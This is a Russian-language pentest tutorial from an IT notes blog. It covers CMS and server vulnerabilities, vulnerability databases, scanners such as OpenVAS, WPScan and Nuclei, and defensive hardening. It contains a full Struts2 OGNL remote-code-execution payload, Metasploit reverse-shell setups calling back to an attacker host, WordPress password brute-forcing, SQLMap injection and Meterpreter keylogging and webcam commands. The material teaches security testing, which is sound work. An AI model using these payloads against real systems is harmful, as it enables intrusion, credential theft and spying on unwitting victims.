The book of Magnus

IT-заметки и знания

Основы пентеста. System vulns

Tags = [ Vulns, Pentest_base ]

При разработке веб-приложений разработчики допускают множество ошибок — как логических, так и технических. Эти ошибки могут возникать из-за различных факторов:

  • Сжатые сроки разработки
  • Недостаточная квалификация команды
  • Отсутствие надлежащего контроля качества
  • Проблемы коммуникации в команде
  • Невнимательность
  • Использование устаревших библиотек и фреймворков

Ошибки накапливаются и превращаются в уязвимости, которые затем эксплуатируются злоумышленниками. Ежедневно эксперты по безопасности и злоумышленники находят критические уязвимости в различных продуктах.

Важный принцип: чем старее версия приложения, тем больше вероятность наличия известных уязвимостей.


Основные компоненты веб-инфраструктуры

CMS (Системы управления контентом)

CMS (Content Management System) — программная система для управления содержимым веб-сайта. Основные функции:

  • Создание, редактирование и удаление контента
  • Управление правами доступа пользователей
  • Организация структуры сайта
  • Управление медиафайлами

Популярные CMS (по состоянию на 2024 год)

CMSДоля рынкаОсобенности
WordPress~43% всех сайтовНаиболее популярная, огромная экосистема плагинов
Shopify~4.4%Специализируется на e-commerce
Wix~2.6%Конструктор сайтов
Squarespace~2.3%Дизайн-ориентированная платформа
Joomla~2.0%Гибкая, но сложнее WordPress
Drupal~1.6%Мощная, для сложных проектов

Примечание: WordPress, будучи самой популярной CMS, также является наиболее частой целью атак из-за своего распространения.

Основные типы CMS

  1. Блоговые платформы: WordPress, Ghost, Medium
  2. E-commerce: Magento, PrestaShop, OpenCart, WooCommerce
  3. Корпоративные: Drupal, TYPO3, Bitrix
  4. Форумы: phpBB, vBulletin, XenForo

Web-серверы

Web-сервер — программа, принимающая HTTP-запросы от клиентов и возвращающая им ответы, обычно в виде HTML-страниц, изображений или других ресурсов.

Популярные веб-серверы (2024)

СерверДоля рынкаПорты по умолчанию
Nginx~34%80, 443
Apache~31%80, 443
Cloudflare Server~22%80, 443
LiteSpeed~12%80, 443
Microsoft IIS~6%80, 443

Особенности серверов

  • Nginx: Высокая производительность, эффективная работа со статикой, часто используется как обратный прокси
  • Apache: Гибкая конфигурация через .htaccess, большое количество модулей
  • LiteSpeed: Коммерческий сервер с высокой производительностью, совместимый с Apache
  • Caddy: Современный сервер с автоматическим HTTPS

FTP-серверы

FTP (File Transfer Protocol) — протокол передачи файлов. Используется для удаленного управления файлами на сервере.

Порт по умолчанию: 21 (управление), 20 (передача данных)

Основные уязвимости FTP

  1. Передача данных в открытом виде — учетные данные и файлы не шифруются
  2. Brute-force атаки — подбор паролей
  3. Анонимный доступ — неправильно настроенный анонимный вход
  4. Bounce-атаки — использование FTP-сервера для сканирования других хостов
  5. DDoS — отказ в обслуживании

Альтернативы FTP

  • SFTP (SSH File Transfer Protocol) — защищенная передача через SSH
  • FTPS (FTP Secure) — FTP с поддержкой TLS/SSL
  • SCP (Secure Copy Protocol) — копирование файлов через SSH

Рекомендация: Используйте SFTP вместо обычного FTP для защиты данных.


SSH

SSH (Secure Shell) — криптографический сетевой протокол для безопасного удаленного управления системами и передачи данных.

Порт по умолчанию: 22

Возможности SSH

  • Удаленное выполнение команд
  • Передача файлов (SFTP, SCP)
  • Туннелирование портов (port forwarding)
  • X11 forwarding (запуск графических приложений)
  • SOCKS-прокси

Популярные SSH-клиенты

  • OpenSSH (Linux, macOS, Windows 10+)
  • PuTTY (Windows)
  • MobaXterm (Windows, расширенный функционал)
  • Termius (кроссплатформенный, удобный интерфейс)

Популярные SSH-серверы

  • OpenSSH (стандарт для Unix-систем)
  • Dropbear (легковесный для встраиваемых систем)
  • Tectia SSH (коммерческое решение)

Рекомендации по безопасности SSH

  1. Использовать ключи вместо паролей
  2. Отключить root-доступ
  3. Изменить стандартный порт
  4. Использовать fail2ban для защиты от brute-force
  5. Ограничить доступ по IP через firewall
  6. Использовать многофакторную аутентификацию

Базы данных уязвимостей

Exploit-DB

Exploit-DB (https://www.exploit-db.com/) — крупнейшая общедоступная база данных эксплойтов и уязвимостей.

Основная информация в базе

ПолеОписание
DateДата публикации эксплойта
DКнопка загрузки файла эксплойта
AДоступность уязвимого приложения
VСтатус верификации эксплойта
TitleНазвание и описание
TypeТип эксплойта (Remote/Local/WebApp/DoS/Shellcode)
PlatformЦелевая платформа
AuthorАвтор эксплойта

Типы эксплойтов

  • Remote Exploit — удаленная эксплуатация
  • Web Application — уязвимости веб-приложений
  • Local Exploit — локальная эксплуатация
  • Privilege Escalation — повышение привилегий
  • DoS (Denial of Service) — отказ в обслуживании
  • Shellcode — вредоносный код
  • Papers — исследовательские статьи

Использование локальной версии (searchsploit)

# Поиск эксплойта для Joomla 3.7.0
searchsploit joomla 3.7.0

# Просмотр содержимого эксплойта
searchsploit -x /path/to/exploit

# Копирование эксплойта в текущую директорию
searchsploit -m 42033

# Обновление базы данных
searchsploit -u

Интеграция с Metasploit

Многие эксплойты из Exploit-DB можно использовать в Metasploit Framework:

# Скачать эксплойт с пометкой Metasploit
# Поместить в директорию:
~/.msf4/modules/exploits/

# Или в системную директорию:
/usr/share/metasploit-framework/modules/exploits/

# Обновить кэш модулей в msfconsole
reload_all

Vulners

Vulners.com — агрегатор информации о уязвимостях из множества источников:

  • CVE (Common Vulnerabilities and Exposures)
  • Exploit-DB
  • Metasploit modules
  • Различные security advisories
  • Bug bounty отчеты

Преимущества Vulners:

  • Единая точка поиска по всем базам
  • API для автоматизации
  • Интеграция с различными сканерами
  • Актуальная информация о патчах

Сканирование на уязвимости

Общие принципы

Сканирование на уязвимости — начальный этап тестирования на проникновение. Процесс включает:

  1. Разведка — определение целей, портов, сервисов
  2. Идентификация — определение версий ПО
  3. Сканирование — поиск известных уязвимостей
  4. Приоритизация — оценка критичности найденных проблем
  5. Верификация — проверка наличия уязвимости
  6. Отчетность — документирование результатов

Этапы работы со сканером

Подготовка → Настройка → Сканирование → Анализ → Эксплуатация → Отчет

OpenVAS/GVM

OpenVAS (Open Vulnerability Assessment System), теперь известный как Greenbone Vulnerability Manager (GVM) — мощный фреймворк для сканирования уязвимостей с открытым исходным кодом.

Установка GVM в Kali Linux

# Установка
sudo apt update
sudo apt install gvm

# Настройка
sudo gvm-setup

# Запуск
sudo gvm-start

# Получение учетных данных
sudo gvm-feed-update

Веб-интерфейс доступен по адресу: https://localhost:9392

Основные компоненты GVM

  1. GVMd — центральный демон управления
  2. OpenVAS Scanner — движок сканирования
  3. Greenbone Security Assistant (GSA) — веб-интерфейс
  4. NVT Feed — база данных тестов уязвимостей (более 80,000 проверок)

Создание задачи сканирования

  1. Configuration → Targets — создать цель сканирования
  2. Scans → Tasks — создать задачу
  3. Выбрать тип сканирования:
    • Full and fast — оптимален для большинства случаев
    • Full and very deep — максимально подробное сканирование
    • System Discovery — обнаружение систем
  4. Запустить сканирование
  5. Scans → Reports — просмотр результатов

Интерпретация результатов

Уязвимости классифицируются по уровню угрозы:

УровеньОценка CVSSЦветДействия
Critical9.0-10.0ФиолетовыйНемедленное исправление
High7.0-8.9КрасныйПриоритетное исправление
Medium4.0-6.9ОранжевыйПлановое исправление
Low0.1-3.9ГолубойИнформационное
Log0.0СерыйДля сведения

Эксплуатация уязвимостей с Metasploit

Metasploit Framework — мощнейший инструмент для тестирования на проникновение и разработки эксплойтов.

Основные команды Metasploit

# Запуск консоли
msfconsole

# Поиск модулей
search struts
search type:exploit platform:linux

# Получение информации о модуле
info exploit/multi/http/struts2_content_type_ognl

# Использование модуля
use exploit/multi/http/struts2_content_type_ognl

# Просмотр опций
show options
show payloads
show targets

# Установка параметров
set RHOSTS 192.168.1.100
set RPORT 8080
set LHOST 192.168.1.50
set LPORT 4444

# Выбор payload
set payload linux/x64/meterpreter/reverse_tcp

# Проверка настроек
check

# Запуск эксплойта
exploit
# или
run

# Работа с сессиями
sessions -l           # Список активных сессий
sessions -i 1         # Подключиться к сессии 1
sessions -k 1         # Завершить сессию 1

Пример: Эксплуатация Apache Struts2 (CVE-2017-5638)

msfconsole

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.example.com
set RPORT 8080
set TARGETURI /showcase.action
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444

check      # Проверить уязвимость
exploit    # Запустить эксплойт

Основные Payloads

Reverse Shell Payloads (обратное подключение)

windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp

Bind Shell Payloads (прямое подключение)

windows/meterpreter/bind_tcp
linux/x64/meterpreter/bind_tcp

Команды Meterpreter

# Системная информация
sysinfo
getuid
ps

# Навигация
pwd
cd /path/to/directory
ls
cat file.txt
download file.txt
upload file.txt

# Повышение привилегий
getsystem
getprivs

# Снимок экрана (Windows)
screenshot

# Запись с веб-камеры
webcam_snap
webcam_stream

# Перехват ввода клавиатуры
keyscan_start
keyscan_dump
keyscan_stop

# Переход в shell
shell

Сканеры для CMS

WPScan (WordPress)

WPScan — специализированный сканер безопасности для WordPress, написанный на Ruby.

Установка и обновление

# Установка (обычно предустановлен в Kali)
sudo gem install wpscan

# Обновление
wpscan --update

# Обновление базы данных
wpscan --update

Базовое использование

# Простое сканирование
wpscan --url https://target.com

# Агрессивное обнаружение плагинов
wpscan --url https://target.com --enumerate ap

# Обнаружение уязвимых плагинов (требуется API токен)
wpscan --url https://target.com --enumerate vp --api-token YOUR_TOKEN

# Обнаружение тем
wpscan --url https://target.com --enumerate t

# Обнаружение пользователей
wpscan --url https://target.com --enumerate u

# Комплексное сканирование
wpscan --url https://target.com --enumerate ap,at,u --api-token YOUR_TOKEN

Получение API токена

  1. Зарегистрироваться на https://wpscan.com/register
  2. Получить бесплатный токен (до 25 запросов в день)
  3. Для расширенного использования — платная подписка

Режимы обнаружения

ФлагОписание
vpУязвимые плагины
apВсе плагины
pПопулярные плагины
vtУязвимые темы
atВсе темы
tПопулярные темы
uПользователи (ID 1-10)
u[1-100]Пользователи (ID 1-100)
mМедиафайлы

Брутфорс WordPress

# Брутфорс с wordlist
wpscan --url https://target.com \
  --enumerate u \
  --passwords /usr/share/wordlists/rockyou.txt

# Брутфорс конкретного пользователя
wpscan --url https://target.com \
  --username admin \
  --passwords /usr/share/wordlists/rockyou.txt

# С ограничением по времени между запросами
wpscan --url https://target.com \
  --username admin \
  --passwords wordlist.txt \
  --throttle 3000

Продвинутые опции

# Использование прокси
wpscan --url https://target.com --proxy http://127.0.0.1:8080

# Игнорирование SSL сертификатов
wpscan --url https://target.com --disable-tls-checks

# Случайный User-Agent
wpscan --url https://target.com --random-user-agent

# Вывод в файл
wpscan --url https://target.com --output result.txt
wpscan --url https://target.com --format json --output result.json

Joomscan (Joomla)

Joomscan — сканер безопасности для Joomla CMS, написанный на Perl.

Установка

# Клонирование репозитория
git clone https://github.com/OWASP/joomscan.git
cd joomscan

# Или через пакетный менеджер в Kali
sudo apt install joomscan

Использование

# Базовое сканирование
joomscan -u https://target.com

# Обнаружение компонентов
joomscan -u https://target.com --enumerate-components

# Сканирование с перечислением
perl joomscan.pl -u https://target.com -ec

Основные опции

-u, --url           URL целевого сайта
-ec                 Перечисление компонентов
--random-agent      Случайный User-Agent
--cookie            Установка cookie
--timeout           Таймаут запроса

Droopescan (Drupal)

Droopescan — сканер для Drupal, Joomla, и других CMS, написанный на Python.

Установка

# Через pip
pip install droopescan

# Или из исходников
git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt

Использование

# Сканирование Drupal
droopescan scan drupal -u https://target.com

# Сканирование с перечислением
droopescan scan drupal -u https://target.com -e p,t,u

# Сканирование Joomla
droopescan scan joomla -u https://target.com

# Вывод в JSON
droopescan scan drupal -u https://target.com --output json

Возможности

  • Определение версии CMS
  • Обнаружение плагинов и тем
  • Выявление известных уязвимостей
  • Поддержка Drupal, Joomla, Moodle, SilverStripe

CMSmap (универсальный)

CMSmap — универсальный сканер CMS, автоматически определяющий тип системы.

Установка

git clone https://github.com/dionach/CMSmap
cd CMSmap
pip3 install -r requirements.txt

Использование

# Автоопределение и сканирование
python3 cmsmap.py https://target.com

# Полное сканирование
python3 cmsmap.py -F https://target.com

# Сканирование WordPress
python3 cmsmap.py -t wordpress https://target.com

# Брутфорс
python3 cmsmap.py https://target.com -u admin -p wordlist.txt

# Эксплуатация
python3 cmsmap.py https://target.com -o exploit.txt

Поддерживаемые CMS

  • WordPress
  • Joomla
  • Drupal
  • Moodle

Современные сканеры уязвимостей

Nikto

Nikto — классический сканер веб-серверов с открытым исходным кодом.

Установка

# Обычно предустановлен в Kali
sudo apt install nikto

# Обновление
nikto -update

Использование

# Базовое сканирование
nikto -h https://target.com

# Сканирование на конкретном порту
nikto -h target.com -p 8080

# Сканирование с SSL
nikto -h https://target.com -ssl

# Использование прокси
nikto -h target.com -useproxy http://proxy:8080

# Вывод в файл
nikto -h target.com -o report.html -Format html

# Тихий режим
nikto -h target.com -Display V

# Агрессивное сканирование с плагинами
nikto -h target.com -Plugins all

Основные проверки Nikto

  • Устаревшие версии серверов и приложений
  • Опасные файлы и директории
  • Неправильные конфигурации
  • Небезопасные файлы и скрипты
  • Проверка robots.txt
  • Утечки информации в заголовках

Nuclei

Nuclei — современный быстрый сканер на основе шаблонов YAML, разработанный ProjectDiscovery.

Установка

# Установка через GO
GO111MODULE=on go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Или скачать бинарный файл
wget https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_linux_amd64.zip
unzip nuclei_linux_amd64.zip
sudo mv nuclei /usr/local/bin/

# Обновление шаблонов
nuclei -update-templates

Базовое использование

# Сканирование одной цели
nuclei -u https://target.com

# Сканирование списка целей
nuclei -l targets.txt

# Сканирование с конкретными шаблонами
nuclei -u https://target.com -t cves/
nuclei -u https://target.com -t exposures/

# Сканирование по степени критичности
nuclei -u https://target.com -s critical,high

# Вывод результатов в файл
nuclei -u https://target.com -o results.txt
nuclei -u https://target.com -json -o results.json

Категории шаблонов

cves/               - CVE уязвимости
vulnerabilities/    - Общие уязвимости
exposures/          - Утечки информации
misconfiguration/   - Неправильные конфигурации
technologies/       - Обнаружение технологий
default-logins/     - Стандартные логины
file/               - Чувствительные файлы
takeovers/          - Subdomain takeover
iot/                - IoT уязвимости

Продвинутое использование

# Использование своих шаблонов
nuclei -u https://target.com -t ./my-templates/

# Исключение определенных шаблонов
nuclei -u https://target.com -exclude-templates exposures/

# Управление параллелизмом
nuclei -u https://target.com -c 50  # 50 одновременных запросов

# Rate limiting
nuclei -u https://target.com -rl 10  # 10 запросов в секунду

# Использование заголовков
nuclei -u https://target.com -H "Cookie: session=abc123"

# Через прокси
nuclei -u https://target.com -proxy http://127.0.0.1:8080

Создание собственного шаблона

id: example-detection

info:
  name: Example Vulnerability Detection
  author: username
  severity: high
  description: Description of vulnerability
  tags: cve,wordpress

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    matchers:
      - type: word
        words:
          - "vulnerable string"
        part: body

Коммерческие решения

Nessus Professional

Nessus от Tenable — один из самых популярных коммерческих сканеров.

Особенности:

  • Более 170,000 плагинов
  • Регулярные обновления
  • Удобный веб-интерфейс
  • Подробная отчетность
  • Compliance scanning

Стоимость: От $3,990/год

Acunetix

Специализируется на веб-приложениях.

Особенности:

  • DeepScan для одностраничных приложений
  • Обнаружение SQLi, XSS, XXE и других уязвимостей
  • Интеграция с CI/CD
  • AcuMonitor для выявления blind XSS

Стоимость: От $4,500/год

Qualys Web Application Scanning

Облачное решение для сканирования веб-приложений.

Особенности:

  • Масштабируемость
  • Интеграция с облачными платформами
  • Continuous monitoring
  • Соответствие стандартам (PCI DSS, HIPAA)

Burp Suite Professional

Особенности:

  • Мощный сканер веб-приложений
  • Интерактивное тестирование
  • Расширяемость через BApp Store
  • Обязательный инструмент для пентестеров

Стоимость: $449/год

RedCheck (российское решение)

Первый отечественный сертифицированный сканер.

Особенности:

  • Соответствие требованиям регуляторов РФ
  • Сканирование СУБД и систем виртуализации
  • Контроль соответствия стандартам
  • Патч-менеджмент

Практические примеры

Пример 1: Обнаружение и эксплуатация PHP CGI Argument Injection

Шаг 1: Сканирование с OpenVAS

Результат: PHP CGI Argument Injection (CVE-2012-1823)
Уязвимые версии: PHP 5.3.13 - 5.4.3 в режиме CGI

Шаг 2: Ручная проверка

curl "http://target.com/index.php?-s"

Если выводится исходный код PHP — уязвимость подтверждена.

Шаг 3: Эксплуатация через Metasploit

msfconsole
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS target.com
set RPORT 80
set TARGETURI /index.php
set payload php/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit

Пример 2: Apache Struts2 RCE (CVE-2017-5638)

Обнаружение через Nuclei

nuclei -u http://target.com:8080 -t cves/2017/CVE-2017-5638.yaml

Ручная эксплуатация через curl

curl -X POST http://target.com:8080/showcase.action \
-H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

Эксплуатация через Metasploit

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.com
set RPORT 8080
set TARGETURI /showcase.action
set payload linux/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit

Пример 3: WordPress Plugin SQL Injection

Обнаружение с WPScan

wpscan --url https://target.com \
  --enumerate vp \
  --api-token YOUR_TOKEN

Результат:

[!] mail-masta 1.0
    - https://wpscan.com/vulnerability/51365dcf-4338-4d45-acb9-4d0d-bf14-75ff
    - SQL Injection

Эксплуатация с SQLMap

sqlmap -u "http://target.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl_id=1" \
  --dbs \
  --batch \
  --random-agent

Выводы и рекомендации

Для тестировщиков безопасности

  1. Используйте несколько инструментов — ни один сканер не находит все уязвимости
  2. Обновляйте инструменты — регулярно обновляйте базы данных уязвимостей
  3. Верифицируйте результаты — автоматические сканеры дают ложные срабатывания
  4. Документируйте процесс — ведите подробные записи для отчетности
  5. Следуйте правилам — всегда получайте разрешение перед сканированием

Для разработчиков и администраторов

  1. Регулярно обновляйте ПО — устанавливайте security patches своевременно
  2. Минимизируйте атакующую поверхность:
    • Отключайте неиспользуемые сервисы
    • Удаляйте ненужные плагины и темы
    • Закрывайте неиспользуемые порты
  3. Используйте принцип наименьших привилегий
  4. Проводите регулярные аудиты безопасности
  5. Мониторьте логи — настройте централизованное логирование
  6. Внедрите WAF — используйте Web Application Firewall
  7. Обучайте команду — проводите тренинги по безопасности

Защита от сканеров

Меры противодействия

  1. Rate limiting — ограничение количества запросов
  2. IDS/IPS — системы обнаружения и предотвращения вторжений (Snort, Suricata)
  3. Fail2Ban — автоматическая блокировка по IP при подозрительной активности
  4. Скрытие версий ПО:
    # Nginx
    server_tokens off;
    
    # Apache
    ServerTokens Prod
    ServerSignature Off
    
  5. Изменение стандартных путей — измените пути к админ-панели
  6. CAPTCHA — на страницах входа
  7. Honeypots — ловушки для выявления сканирования

Лучшие практики

Для WordPress

  • Использовать последнюю версию
  • Удалить стандартного пользователя admin
  • Ограничить попытки входа (Limit Login Attempts)
  • Использовать security плагины (Wordfence, Sucuri)
  • Отключить XML-RPC если не используется
  • Скрыть версию WordPress
  • Регулярно делать бэкапы

Для любой CMS

  • Использовать сложные пароли
  • Включить двухфакторную аутентификацию
  • Регулярно проверять и обновлять плагины
  • Удалять неиспользуемые расширения
  • Настроить правильные права доступа к файлам
  • Использовать HTTPS
  • Настроить Content Security Policy (CSP)
  • Регулярно проверять наличие backdoors

Полезные ресурсы

Базы данных уязвимостей

  • https://www.exploit-db.com/
  • https://vulners.com/
  • https://nvd.nist.gov/
  • https://cve.mitre.org/
  • https://www.cvedetails.com/

Обучающие ресурсы

  • https://www.hackerone.com/hacktivity
  • https://portswigger.net/web-security
  • https://owasp.org/
  • https://www.offensive-security.com/
  • https://tryhackme.com/
  • https://www.hackthebox.com/

Инструменты

  • https://github.com/projectdiscovery/nuclei
  • https://github.com/wpscanteam/wpscan
  • https://www.metasploit.com/
  • https://github.com/sullo/nikto
  • https://www.openvas.org/

Заключение

Системные уязвимости веб-приложений остаются одной из основных векторов атак. Регулярное сканирование, своевременное обновление ПО и следование лучшим практикам безопасности — ключевые факторы защиты веб-инфраструктуры.

Помните: безопасность — это не одноразовое действие, а непрерывный процесс.